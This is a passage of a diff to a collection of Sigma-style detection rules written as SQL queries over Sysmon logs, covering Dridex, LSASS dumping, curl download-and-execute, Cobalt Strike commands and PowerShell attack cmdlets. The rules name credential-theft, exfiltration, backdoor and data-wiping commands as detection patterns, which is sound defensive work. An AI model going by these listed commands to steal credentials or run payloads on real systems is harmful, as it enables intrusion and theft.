"e6eb5a96-9e6f-4a18-9cdd-642cfda21c8e", + "status": "stable", + "description": "Detects potential Dridex acitvity via specific process patterns", + "author": "Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.privilege_escalation", + "attack.t1055", + "attack.discovery", + "attack.t1135", + "attack.t1033" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR 
OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') AND NOT (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND (CommandLine LIKE '% -s %' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.dll%' ESCAPE '\\'))) OR (ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' AND CommandLine LIKE '% /all%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% view%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_lolbin_manage_bde.yml" + "filename": "proc_creation_win_malware_dridex.yml" }, { - "title": "Potential MSTSC Shadowing Activity", - "id": "6ba5a05f-b095-4f0a-8654-b825f4f16334", + "title": "Sysprep on AppData Folder", + "id": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", "status": "test", - "description": "Detects RDP session hijacking by using MSTSC shadowing", + "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - 
"level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%noconsentprompt%' ESCAPE '\\' AND CommandLine LIKE '%shadow:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sysprep.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_mstsc_rdp_hijack_shadowing.yml" + "filename": "proc_creation_win_sysprep_appdata.yml" }, { - "title": "HackTool - SharpUp PrivEsc Tool Execution", - "id": "c484e533-ee16-4a93-b6ac-f0ea4868b2f1", + "title": "Replace.exe Usage", + "id": "9292293b-8496-4715-9db6-37028dcda4b3", "status": "experimental", - "description": "Detects the use of SharpUp, a tool for local privilege escalation", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of Replace.exe which can be used to replace file with another file", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1615", - "attack.t1569.002", - "attack.t1574.005" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SharpUp.exe' ESCAPE '\\' OR Description = 'SharpUp' OR (CommandLine LIKE '%HijackablePaths%' ESCAPE '\\' OR CommandLine LIKE '%UnquotedServicePath%' ESCAPE '\\' OR CommandLine LIKE '%ProcessDLLHijack%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableServiceBinaries%' ESCAPE '\\' OR CommandLine LIKE '%ModifiableScheduledTask%' ESCAPE '\\' OR CommandLine LIKE '%DomainGPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%CachedGPPPassword%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\replace.exe' ESCAPE '\\' AND 
(CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharpup.yml" + "filename": "proc_creation_win_lolbin_replace.yml" }, { - "title": "DarkSide Ransomware Pattern", - "id": "965fff6c-1d7e-4e25-91fd-cdccd75f7d2c", + "title": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN", + "id": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", "status": "test", - "description": "Detects DarkSide Ransomware and helpers", - "author": "Florian Roth (Nextron Systems)", + "description": "dotnet.exe will execute any DLL and execute unsigned code", + "author": "Beyu Denis, oscd.community", "tags": [ "attack.execution", - "attack.t1204" + "attack.t1218" ], "falsepositives": [ - "Unknown", - "UAC bypass method used by other malware" + "System administrator Usage" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%=[char][byte](''0x''+%' ESCAPE '\\' OR CommandLine LIKE '% -work worker0 -path %' ESCAPE '\\') OR (ParentCommandLine LIKE '%DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dotnet.exe' ESCAPE '\\' OR OriginalFileName = '.NET Host') AND (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.csproj' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_darkside_ransomware.yml" + "filename": "proc_creation_win_lolbin_dotnet.yml" }, { - "title": "Time Travel Debugging Utility Usage", - "id": "0b4ae027-2a2d-4b93-8c7e-962caaba5b2a", + "title": "RDP Connection Allowed Via Netsh.EXE", + "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. 
Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", + "author": "Sander Wiebing", "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.t1562.004" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Legitimate administration activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\tttracer.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" + "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" }, { - "title": "Ilasm Lolbin Use Compile C-Sharp", - "id": "850d55f9-6eeb-4492-ad69-a72338f65ba4", - "status": "experimental", - "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", - "author": "frack113", + "title": "PowerShell Base64 Encoded Invoke Keyword", + "id": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "status": "test", + "description": "Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls", + "author": "pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t", "tags": [ + "attack.execution", + "attack.t1059.001", "attack.defense_evasion", - 
"attack.t1127" + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ilasm.exe' ESCAPE '\\' OR OriginalFileName = 'ilasm.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR CommandLine LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR CommandLine LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\' OR CommandLine LIKE '%SW52b2tlL%' ESCAPE '\\' OR CommandLine LIKE '%ludm9rZS%' ESCAPE '\\' OR CommandLine LIKE '%JbnZva2Ut%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ilasm.yml" + "filename": "proc_creation_win_powershell_base64_invoke.yml" }, { - "title": "LSASS Memory Dumping", - "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", - "status": "test", - "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", - "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "title": "Service Started/Stopped Via Wmic.EXE", + "id": "0b7163dc-7eee-4960-af17-c0cd517f92da", + "status": "experimental", + "description": "Detects usage of wmic to start or stop a service", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\werfault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service %' ESCAPE '\\' AND CommandLine LIKE '% call %' ESCAPE '\\' AND (CommandLine LIKE '%stopservice%' ESCAPE '\\' OR CommandLine LIKE '%startservice%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_lsass_dump.yml" + "filename": "proc_creation_win_wmic_service_manipulation.yml" }, { - "title": "Suspicious Diantz Download and Compress Into a CAB File", - "id": "185d7418-f250-42d0-b72e-0c8b70661e93", + "title": "Suspicious Execution From GUID Like Folder Names", + "id": "90b63c33-2b97-4631-a011-ceb0f47b77c3", "status": "experimental", - "description": "Download and compress a remote file and store it in a cab file on local machine.", - "author": "frack113", + "description": "Detects potential suspicious execution of a GUID like folder name located in a suspicious location such as %TEMP% as seen being used in IcedID attacks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1027" ], 
"falsepositives": [ - "Unknown" + "Installers are sometimes known for creating temporary folders with GUID like names. Add appropriate filters accordingly" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND CommandLine LIKE '%\\\\{%' ESCAPE '\\' AND CommandLine LIKE '%}\\\\%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\{%' ESCAPE '\\' AND Image LIKE '%}\\\\%' ESCAPE '\\') OR (Image = '') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml" + "filename": "proc_creation_win_susp_execution_from_guid_folder_names.yml" }, { - "title": "DllUnregisterServer Function Call Via Msiexec.EXE", - "id": "84f52741-8834-4a8c-a413-2eb2269aa6c8", + "title": "Suspect Svchost Activity", + "id": "16c37b52-b141-42a5-a3ea-bbe098444397", "status": "experimental", - "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", - "author": "frack113", + "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", + "author": "David Burkett, @signalblur", "tags": [ "attack.defense_evasion", - "attack.t1218.007" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Rpcnet.exe / rpcnetp.exe which is a lojack style software. 
https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND (CommandLine LIKE '% /z %' ESCAPE '\\' OR CommandLine LIKE '% -z %' ESCAPE '\\') AND CommandLine LIKE '%.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" ], - "filename": "proc_creation_win_msiexec_dll.yml" + "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" }, { - "title": "Weak or Abused Passwords In CLI", - "id": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", + "title": "HackTool - Certify Execution", + "id": "762f2482-ff21-4970-8939-0aa317a886bb", "status": "experimental", - "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. 
An example would be a threat actor creating a new user via the net command and providing the password inline", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.execution" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Legitimate usage of the passwords by users via commandline (should be discouraged)", - "Other currently unknown false positives" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Asd123.aaaa%' ESCAPE '\\' OR CommandLine LIKE '%password123%' ESCAPE '\\' OR CommandLine LIKE '%123456789%' ESCAPE '\\' OR CommandLine LIKE '%P@ssw0rd!%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Certify.exe' ESCAPE '\\' OR OriginalFileName = 'Certify.exe' OR Description LIKE '%Certify%' ESCAPE '\\') OR ((CommandLine LIKE '%.exe cas %' ESCAPE '\\' OR CommandLine LIKE '%.exe find %' ESCAPE '\\' OR CommandLine LIKE '%.exe pkiobjects %' ESCAPE '\\' OR CommandLine LIKE '%.exe request %' ESCAPE '\\' OR CommandLine LIKE '%.exe download %' ESCAPE '\\') AND (CommandLine LIKE '% /vulnerable%' ESCAPE '\\' OR CommandLine LIKE '% /template:%' ESCAPE '\\' OR CommandLine LIKE '% /altname:%' ESCAPE '\\' OR CommandLine LIKE '% /domain:%' ESCAPE '\\' OR CommandLine LIKE '% /path:%' ESCAPE '\\' OR CommandLine LIKE '% /ca:%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_weak_or_abused_passwords.yml" + "filename": "proc_creation_win_hktl_certify.yml" }, { - "title": "Exploit for CVE-2015-1641", - "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", - "status": "stable", - 
"description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", - "author": "Florian Roth (Nextron Systems)", + "title": "Curl Download And Execute Combination", + "id": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", + "status": "test", + "description": "Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.", + "author": "Sreeman, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.execution", + "attack.t1218", + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /c %' ESCAPE '\\' AND CommandLine LIKE '%curl %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%-o%' ESCAPE '\\' AND CommandLine LIKE '%&%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2015_1641.yml" + "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" }, { - "title": "Remote Access Tool - RURAT Execution From Unusual Location", - "id": "e01fa958-6893-41d4-ae03-182477c5e77d", + "title": "DLL Sideloading by VMware Xfer Utility", + "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", "status": "experimental", - "description": "Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\\Program Files')", + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - 
"attack.defense_evasion" + "attack.defense_evasion", + "attack.t1574.002" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" + }, + { + "title": "Deleted Data Overwritten Via Cipher.EXE", + "id": "4b046706-5789-4673-b111-66f25fe99534", + "status": "experimental", + "description": "Detects usage of the \"cipher\" built-in utility in order to overwrite deleted data from disk.\nAdversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources.\nData destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives\n", + "author": "frack113", + "tags": [ + "attack.impact", + "attack.t1485" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR Image LIKE '%\\\\rfusclient.exe' ESCAPE '\\') OR Product = 'Remote Utilities') AND NOT ((Image LIKE 'C:\\\\Program Files\\\\Remote Utilities%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Remote Utilities%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'CIPHER.EXE' OR Image LIKE '%\\\\cipher.exe' ESCAPE '\\') AND CommandLine LIKE '% /w:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_rurat_non_default_location.yml" + "filename": "proc_creation_win_cipher_overwrite_deleted_data.yml" }, { - "title": "Use of Wfc.exe", - "id": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", + 
"title": "Operator Bloopers Cobalt Strike Commands", + "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", "status": "experimental", - "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", - "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate use by a software developer" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\wfc.exe' ESCAPE '\\' OR OriginalFileName = 'wfc.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_wfc.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" }, { - "title": "REGISTER_APP.VBS Proxy Execution", - "id": "1c8774a0-44d4-4db0-91f8-e792359c70bd", + "title": "Malicious PowerShell Commandlets - ProcessCreation", + "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", "status": "experimental", - 
"description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of the script. Always investigate what's being registered to confirm if it's benign" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\register\\_app.vbs%' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADR%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRCSV%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRExcel%' 
ESCAPE '\\' OR CommandLine LIKE '%Export-ADRHTML%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRJSON%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRXML%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ADIDNS%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine 
